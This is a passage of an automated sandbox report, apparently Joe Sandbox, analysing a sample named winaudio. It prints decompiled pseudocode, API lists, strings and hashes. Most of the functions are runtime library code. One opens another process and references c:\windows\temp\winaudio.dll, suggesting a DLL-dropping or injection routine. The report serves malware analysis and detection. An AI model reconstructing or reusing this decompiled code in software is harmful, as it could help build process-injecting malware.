						_t60 = E0038DD8B(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E003839E9(_t100);
									goto L36;
								}
								_t62 = E0038DD8B(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E003839E9(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E0038B939(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E00397C40();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E0038DD8B(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0038B939(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00397C40();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}



























                        0x0038f412
                        0x0038f413
                        0x0038f414
                        0x0038f41b
                        0x0038f420
                        0x0038f426
                        0x0038f42c
                        0x0038f432
                        0x0038f435
                        0x0038f435
                        0x0038f438
                        0x0038f43a
                        0x0038f43a
                        0x0038f438
                        0x0038f43c
                        0x0038f441
                        0x0038f448
                        0x0038f44b
                        0x0038f44b
                        0x0038f467
                        0x0038f46d
                        0x0038f472
                        0x0038f605
                        0x0038f609
                        0x0038f618
                        0x0038f478
                        0x0038f478
                        0x0038f47b
                        0x0038f480
                        0x0038f484
                        0x0038f4d8
                        0x0038f4d8
                        0x0038f4da
                        0x0038f4dc
                        0x0038f5fa
                        0x0038f5fa
                        0x0038f5fc
                        0x0038f5fd
                        0x00000000
                        0x0038f603
                        0x0038f4ed
                        0x0038f4f3
                        0x0038f4f5
                        0x00000000
                        0x00000000
                        0x0038f4fb
                        0x0038f50d
                        0x0038f512
                        0x0038f516
                        0x00000000
                        0x00000000
                        0x0038f523
                        0x0038f55d
                        0x0038f560
                        0x0038f563
                        0x0038f565
                        0x0038f567
                        0x0038f569
                        0x0038f5b5
                        0x0038f5b5
                        0x0038f5b7
                        0x0038f5b7
                        0x0038f5b9
                        0x0038f5f3
                        0x0038f5f4
                        0x00000000
                        0x0038f5f9
                        0x0038f5cd
                        0x0038f5d2
                        0x0038f5d4
                        0x00000000
                        0x00000000
                        0x0038f5d8
                        0x0038f5d9
                        0x0038f5da
                        0x0038f5dd
                        0x0038f619
                        0x0038f61c
                        0x0038f5df
                        0x0038f5df
                        0x0038f5e0
                        0x0038f5e0
                        0x0038f5ed
                        0x0038f5ef
                        0x0038f5f1
                        0x0038f622
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038f5f1
                        0x0038f56b
                        0x0038f56e
                        0x0038f570
                        0x0038f572
                        0x0038f574
                        0x0038f577
                        0x0038f57c
                        0x0038f597
                        0x0038f599
                        0x0038f5a3
                        0x0038f5a5
                        0x0038f5a6
                        0x0038f5a8
                        0x00000000
                        0x00000000
                        0x0038f5aa
                        0x0038f5b0
                        0x0038f5b0
                        0x00000000
                        0x0038f5b0
                        0x0038f57e
                        0x0038f580
                        0x0038f584
                        0x0038f589
                        0x0038f58b
                        0x0038f58d
                        0x00000000
                        0x00000000
                        0x0038f58f
                        0x00000000
                        0x0038f58f
                        0x0038f525
                        0x0038f52a
                        0x00000000
                        0x00000000
                        0x0038f530
                        0x0038f532
                        0x00000000
                        0x00000000
                        0x0038f549
                        0x0038f54e
                        0x0038f552
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038f558
                        0x0038f48b
                        0x0038f48d
                        0x0038f48f
                        0x0038f497
                        0x0038f4b6
                        0x0038f4b8
                        0x0038f4c2
                        0x0038f4c4
                        0x0038f4c5
                        0x0038f4c7
                        0x00000000
                        0x00000000
                        0x0038f4cd
                        0x0038f4d3
                        0x0038f4d3
                        0x00000000
                        0x0038f4d3
                        0x0038f49b
                        0x0038f49f
                        0x0038f4a4
                        0x0038f4a8
                        0x00000000
                        0x00000000
                        0x0038f4ae
                        0x00000000
                        0x0038f4ae

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00382981,00382981,?,?,?,0038F65E,00000001,00000001,6DE85006), ref: 0038F467
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038F65E,00000001,00000001,6DE85006,?,?,?), ref: 0038F4ED
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,6DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038F5E7
                        • __freea.LIBCMT ref: 0038F5F4
                          • Part of subcall function 0038B939: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        • __freea.LIBCMT ref: 0038F5FD
                        • __freea.LIBCMT ref: 0038F622
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: abd236a352e4f0c016f6a125a65675418ce3b1826ebf550844442760488b92fa
                        • Instruction ID: a544ecd03c6f7c2bf21809976905d945951a4ecc2b603ad258c1d9b94efba69a
                        • Opcode Fuzzy Hash: abd236a352e4f0c016f6a125a65675418ce3b1826ebf550844442760488b92fa
                        • Instruction Fuzzy Hash: 9451D072600316AFEF27AE64DC81EAB77A9EB45750F2646B9FC05DA140EB74DC408760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038F101 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E0038F101(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E0038DA53(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0038B939(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E00380E68(GetLastError());
								}
							}
							E0038B8FF(_t40);
							_t14 = _t35;
						} else {
							E00380E68(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00380E9E())) = 0x16;
						E0037F971();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00380E9E())) = 0x16;
				E0037F971();
				return 0;
			}















                        0x0038f106
                        0x0038f10b
                        0x0038f125
                        0x0038f128
                        0x0038f12a
                        0x0038f143
                        0x0038f145
                        0x0038f14c
                        0x0038f14e
                        0x0038f157
                        0x0038f158
                        0x0038f15c
                        0x0038f162
                        0x0038f165
                        0x0038f167
                        0x0038f181
                        0x0038f184
                        0x0038f186
                        0x0038f193
                        0x0038f199
                        0x0038f19b
                        0x0038f1af
                        0x0038f1b1
                        0x0038f1b5
                        0x0038f1b5
                        0x0038f1b6
                        0x0038f19d
                        0x0038f1a4
                        0x0038f1a9
                        0x0038f19b
                        0x0038f1b9
                        0x0038f1be
                        0x0038f169
                        0x0038f170
                        0x0038f175
                        0x0038f175
                        0x0038f12c
                        0x0038f131
                        0x0038f137
                        0x0038f13c
                        0x0038f13c
                        0x00000000
                        0x0038f1c3
                        0x0038f112
                        0x0038f118
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 458cf6a7373c49fbeac88e92ea17f5c0b46361aa37c92937a4f5771ca920baf6
                        • Instruction ID: e4975b55fc5ba84a0d8c532003f845e21fc856f6bdf2d476fb98c3293da869c7
                        • Opcode Fuzzy Hash: 458cf6a7373c49fbeac88e92ea17f5c0b46361aa37c92937a4f5771ca920baf6
                        • Instruction Fuzzy Hash: A311AF72505316FFDB237FB6DC4996B7AACEF86730B214AA5F815DA250DA3188009770
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037F08A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0037F08A(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x3e6120 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0037F3D9(__eflags,  *0x3e6120);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0037F413(__eflags,  *0x3e6120, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0038B987(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0037F413(__eflags,  *0x3e6120, 0);
								} else {
									__eflags = E0037F413(__eflags,  *0x3e6120, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E0038B8FF(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                        0x0037f091
                        0x0037f0a4
                        0x0037f0ab
                        0x0037f0ae
                        0x0037f0b1
                        0x0037f0ca
                        0x0037f0ca
                        0x0037f0b3
                        0x0037f0b3
                        0x0037f0b5
                        0x0037f0bf
                        0x0037f0c5
                        0x0037f0c6
                        0x0037f0c8
                        0x0037f0d8
                        0x0037f0dc
                        0x0037f0de
                        0x0037f0f2
                        0x0037f0f2
                        0x0037f0fb
                        0x0037f0e0
                        0x0037f0ee
                        0x0037f0f0
                        0x0037f104
                        0x0037f106
                        0x0037f106
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0037f0f0
                        0x0037f109
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0037f0c8
                        0x0037f0b5
                        0x0037f111
                        0x0037f11b
                        0x0037f093
                        0x0037f095
                        0x0037f095

                        APIs
                        • GetLastError.KERNEL32(?,?,0037F081,0037D8A8,003DF3B0,00000010,0037D070,?,?,?,?,?,00000000,?), ref: 0037F098
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0037F0A6
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0037F0BF
                        • SetLastError.KERNEL32(00000000,0037F081,0037D8A8,003DF3B0,00000010,0037D070,?,?,?,?,?,00000000,?), ref: 0037F111
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: bcf832d80459eb33bed907bd6be2142902c7add6174c5f24b4296f076cdf55e4
                        • Instruction ID: 9f6d92afd4b28e079c9c3632db7dc76e6ae8748205c3fd51ff4f75e68df70ca1
                        • Opcode Fuzzy Hash: bcf832d80459eb33bed907bd6be2142902c7add6174c5f24b4296f076cdf55e4
                        • Instruction Fuzzy Hash: 1C0184321093129EE6373676BCC656B2B9CFB157B5B31833EF1195A1F2EF5A4C10A284
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002E5100 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___from_strstr_to_strchr.LIBCMT ref: 002E5233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ___from_strstr_to_strchr
                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                        • API String ID: 601868998-2416195885
                        • Opcode ID: 65c7308639ff77a45183e72cddbd0e51b5f855ddd95eef2f79d5ba376dcf85f6
                        • Instruction ID: a556778dd9cf92511eb806e69a92bd5bd9b3a6c10d88180218d63a39f4a35e6d
                        • Opcode Fuzzy Hash: 65c7308639ff77a45183e72cddbd0e51b5f855ddd95eef2f79d5ba376dcf85f6
                        • Instruction Fuzzy Hash: D9413B716647559BCB20DE55CC41BABB3D8AF81704F84083DF685E7142E774E9188BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D7E80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
                        Download Yara Rule
                        C-Code - Quality: 57%
                        			E002D7E80(signed int* __ecx, signed int _a4) {
				char _v8;
				signed int* _v12;
				char _v16;
				intOrPtr _v20;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t57;
				signed int _t61;
				signed int _t62;
				intOrPtr _t64;
				signed int _t74;
				intOrPtr _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t85;
				signed int* _t86;
				signed int* _t93;
				void* _t98;
				signed int* _t105;
				signed int _t106;
				intOrPtr* _t108;
				signed int _t109;
				intOrPtr _t110;
				signed int _t114;

				_t86 = __ecx;
				_t83 = _a4;
				_t108 = __ecx;
				_v12 = __ecx;
				if(_t83 != 0) {
					__eflags = _t83 - 0xaaaaaaa;
					if(__eflags > 0) {
						E002E0503(__eflags);
						goto L15;
					} else {
						_t61 = _t83 + _t83 * 2 << 3;
						__eflags = _t61 - 0x1000;
						if(__eflags < 0) {
							_t62 = E002E057E(_t98, __ecx, __eflags, _t61);
							_t114 = _t114 + 4;
							_t106 = _t62;
							goto L7;
						} else {
							_t5 = _t61 + 0x23; // 0x118688b
							_t86 = _t5;
							__eflags = _t86 - _t61;
							if(__eflags <= 0) {
								L15:
								E002E0503(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0xffffffff);
								_push(0x39c890);
								_push( *[fs:0x0]);
								_push(_t83);
								_push(_t108);
								_t51 =  *0x3e1008; // 0x847b54ee
								_push(_t51 ^ _t114);
								 *[fs:0x0] =  &_v44;
								_t105 = _t86;
								_t84 =  *( *_t105 + 4);
								_t109 = _t84;
								__eflags =  *((char*)(_t84 + 0xd));
								if( *((char*)(_t84 + 0xd)) == 0) {
									do {
										E002D8440(_t105,  *((intOrPtr*)(_t109 + 8)));
										_t109 =  *_t109;
										L002E05B1(_t84);
										_t114 = _t114 + 4;
										_t84 = _t109;
										__eflags =  *((char*)(_t109 + 0xd));
									} while ( *((char*)(_t109 + 0xd)) == 0);
								}
								 *( *_t105 + 4) =  *_t105;
								 *( *_t105) =  *_t105;
								_t57 =  *_t105;
								 *(_t57 + 8) = _t57;
								_t105[1] = 0;
								 *[fs:0x0] = _v20;
								return _t57;
							} else {
								_t82 = E002E057E(_t98, __ecx, __eflags, _t86);
								_t114 = _t114 + 4;
								_t6 = _t82 + 0x23; // 0x23
								_t106 = _t6 & 0xffffffe0;
								 *((intOrPtr*)(_t106 - 4)) = _t82;
								goto L7;
							}
						}
					}
				} else {
					_t106 = 0;
					L7:
					_t8 = _t108 + 4; // 0x1186868
					_push(_t86);
					_v8 = 0;
					_push(_v8);
					_push(_t86);
					E002D8880( *_t108,  *_t8, _t106);
					_t11 = _t108 + 4; // 0x1186868
					_t64 =  *_t11;
					_t110 =  *_t108;
					_v8 = _t64;
					_v16 = (0x2aaaaaab * (_t64 - _t110) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t64 - _t110) >> 0x20 >> 2);
					if(_t110 != 0) {
						if(_t110 != _v8) {
							_t85 = _v8;
							do {
								E002D0420(_t85, _t110, _t106);
								_t110 = _t110 + 0x18;
							} while (_t110 != _t85);
							_t83 = _a4;
						}
						_push((0x2aaaaaab * (_v12[2] -  *_v12) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v12[2] -  *_v12) >> 0x20 >> 2));
						E002D7E20(_t83, _t106,  *_v12);
					}
					_t93 = _v12;
					_t93[2] = _t106 + (_t83 + _t83 * 2) * 8;
					_t33 =  &_v16; // 0x2d7429
					_t74 = _t106 + ( *_t33 +  *_t33 * 2) * 8;
					_t93[1] = _t74;
					 *_t93 = _t106;
					return _t74;
				}
			}































                        0x002d7e80
                        0x002d7e87
                        0x002d7e8b
                        0x002d7e8d
                        0x002d7e93
                        0x002d7e99
                        0x002d7e9f
                        0x002d7f76
                        0x00000000
                        0x002d7ea5
                        0x002d7ea8
                        0x002d7eab
                        0x002d7eb0
                        0x002d7ed2
                        0x002d7ed7
                        0x002d7eda
                        0x00000000
                        0x002d7eb2
                        0x002d7eb2
                        0x002d7eb2
                        0x002d7eb5
                        0x002d7eb7
                        0x002d7f7b
                        0x002d7f7b
                        0x002d7f80
                        0x002d7f81
                        0x002d7f82
                        0x002d7f83
                        0x002d7f84
                        0x002d7f85
                        0x002d7f86
                        0x002d7f87
                        0x002d7f88
                        0x002d7f89
                        0x002d7f8a
                        0x002d7f8b
                        0x002d7f8c
                        0x002d7f8d
                        0x002d7f8e
                        0x002d7f8f
                        0x002d7f93
                        0x002d7f95
                        0x002d7fa0
                        0x002d7fa1
                        0x002d7fa2
                        0x002d7fa4
                        0x002d7fab
                        0x002d7faf
                        0x002d7fb5
                        0x002d7fb9
                        0x002d7fbc
                        0x002d7fbe
                        0x002d7fc2
                        0x002d7fc4
                        0x002d7fc9
                        0x002d7fce
                        0x002d7fd1
                        0x002d7fd6
                        0x002d7fd9
                        0x002d7fdb
                        0x002d7fdb
                        0x002d7fc4
                        0x002d7fe3
                        0x002d7fe8
                        0x002d7fea
                        0x002d7fec
                        0x002d7fef
                        0x002d7ff9
                        0x002d8007
                        0x002d7ebd
                        0x002d7ebe
                        0x002d7ec3
                        0x002d7ec6
                        0x002d7ec9
                        0x002d7ecc
                        0x00000000
                        0x002d7ecc
                        0x002d7eb7
                        0x002d7eb0
                        0x002d7e95
                        0x002d7e95
                        0x002d7edc
                        0x002d7edc
                        0x002d7edf
                        0x002d7ee0
                        0x002d7ee4
                        0x002d7ee7
                        0x002d7eeb
                        0x002d7ef0
                        0x002d7ef0
                        0x002d7ef6
                        0x002d7efa
                        0x002d7f10
                        0x002d7f15
                        0x002d7f1a
                        0x002d7f1c
                        0x002d7f20
                        0x002d7f22
                        0x002d7f27
                        0x002d7f2a
                        0x002d7f2e
                        0x002d7f2e
                        0x002d7f4c
                        0x002d7f4e
                        0x002d7f4e
                        0x002d7f53
                        0x002d7f5c
                        0x002d7f5f
                        0x002d7f65
                        0x002d7f68
                        0x002d7f6b
                        0x002d7f73
                        0x002d7f73

                        APIs
                        • new.LIBCMT ref: 002D7EBE
                        • Concurrency::cancel_current_task.LIBCPMT ref: 002D7F76
                          • Part of subcall function 002E0503: __CxxThrowException@8.LIBVCRUNTIME ref: 002E051A
                        • Concurrency::cancel_current_task.LIBCPMT ref: 002D7F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Concurrency::cancel_current_task$Exception@8Throw
                        • String ID: )t-
                        • API String ID: 3339364867-3327214842
                        • Opcode ID: 05a0ab309230e04d37d3466b5793246f7d441d2e412dee77aacb9c49695aac6a
                        • Instruction ID: d2395fa1b129786a9e613dc120baf08b5623b2cf9c7c13333f128fe47cc03d9e
                        • Opcode Fuzzy Hash: 05a0ab309230e04d37d3466b5793246f7d441d2e412dee77aacb9c49695aac6a
                        • Instruction Fuzzy Hash: CE31DD72E101099FCB28DF5CC8C199DB7F5EF8830475441AAE809D7351E735AE66CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D69E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E002D69E0(void* __ecx, void* __edx, void* __edi, long _a4) {
				signed int _v8;
				char _v268;
				char _v272;
				void* __esi;
				signed int _t15;
				signed int _t22;
				signed int _t32;
				signed int _t34;
				void* _t49;
				long _t51;
				void* _t52;
				signed int _t53;

				_t49 = __edx;
				_t40 = __ecx;
				_t15 =  *0x3e1008; // 0x847b54ee
				_v8 = _t15 ^ _t53;
				_t51 = _a4;
				_t52 = __ecx;
				E0037E1A0(_t51,  &_v268, 0, 0x104);
				_v272 = 1;
				if( *((intOrPtr*)(_t52 + 0x18)) == 0) {
					L5:
					E003802FE( &_v268, 0x104, "c:\\windows\\temp\\winaudio.dll");
					_t22 = E00383166( &_v268, 0);
					__eflags = _t22;
					if(_t22 != 0) {
						GetLastError();
						__eflags = _v8 ^ _t53;
						return E002E056D(_v8 ^ _t53, _t49, _t52);
					} else {
						_push(_t51);
						_push(_t22);
						__eflags =  *0x3eb535 - _t22; // 0x1
						if(__eflags == 0) {
							_push(E002D5E20);
						} else {
							_push(E002D5EA0);
						}
						E00381153(_t40, _t49) - 0xffffffff = _v8 ^ _t53;
						return E002E056D(_v8 ^ _t53, _t49, _t52);
					}
				} else {
					_t52 = OpenProcess(0x42a, 0, _t51);
					if(_t52 != 0) {
						_t32 =  *0x3ebb4c; // 0x6556
						_t40 = 0;
						_t34 =  >  ? 0 : _t32 + 2;
						 *0x3ebb4c = _t34;
						 *0x3f0830 = _t34 & 0x00000019 | 0x000000e0;
						 *0x3f0848(_t52,  &_v272);
						CloseHandle(_t52);
					}
					if(_v272 != 0) {
						goto L5;
					} else {
						 *0x3f0830 = 0x7ff7;
						return E002E056D(_v8 ^ _t53, _t49, _t52);
					}
				}
			}















                        0x002d69e0
                        0x002d69e0
                        0x002d69e9
                        0x002d69f0
                        0x002d69f5
                        0x002d6a06
                        0x002d6a08
                        0x002d6a10
                        0x002d6a1e
                        0x002d6a97
                        0x002d6aa8
                        0x002d6ab6
                        0x002d6abe
                        0x002d6ac0
                        0x002d6afc
                        0x002d6b09
                        0x002d6b14
                        0x002d6ac2
                        0x002d6ac2
                        0x002d6ac3
                        0x002d6ac4
                        0x002d6aca
                        0x002d6ad3
                        0x002d6acc
                        0x002d6acc
                        0x002d6acc
                        0x002d6aef
                        0x002d6af9
                        0x002d6af9
                        0x002d6a20
                        0x002d6a2e
                        0x002d6a32
                        0x002d6a34
                        0x002d6a39
                        0x002d6a43
                        0x002d6a46
                        0x002d6a53
                        0x002d6a60
                        0x002d6a67
                        0x002d6a67
                        0x002d6a74
                        0x00000000
                        0x002d6a77
                        0x002d6a77
                        0x002d6a94
                        0x002d6a94
                        0x002d6a74

                        APIs
                        • OpenProcess.KERNEL32(0000042A,00000000,?), ref: 002D6A28
                        • IsWow64Process.KERNEL32(00000000,00000001), ref: 002D6A60
                        • CloseHandle.KERNEL32(00000000), ref: 002D6A67
                        • GetLastError.KERNEL32 ref: 002D6AFC
                        Strings
                        • c:\windows\temp\winaudio.dll, xrefs: 002D6A97
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
